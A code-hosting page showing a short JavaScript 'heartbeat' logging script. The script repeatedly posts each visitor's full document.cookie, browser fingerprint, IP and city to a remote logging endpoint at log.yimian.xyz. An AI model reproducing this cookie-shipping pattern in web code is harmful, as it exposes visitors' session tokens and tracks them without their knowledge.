You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

22 lines
488 B

5 years ago
var __tmpCookie = "";
5 years ago
(function heartbeat_log()
{
setTimeout(function(){
setInterval(function(){
5 years ago
if(__isCookie && __tmpCookie != document.cookie){
5 years ago
$.post("https://log.yimian.xyz/heartbeat.php",{"fp":fp, "cookie":document.cookie});
cookie.set('fp',fp);
5 years ago
__tmpCookie = document.cookie;
5 years ago
}
},4000);
$.post("https://log.yimian.xyz/heartbeat.php",{"ip":ip,"fp":fp,"city":ipCity});
},3000);
})();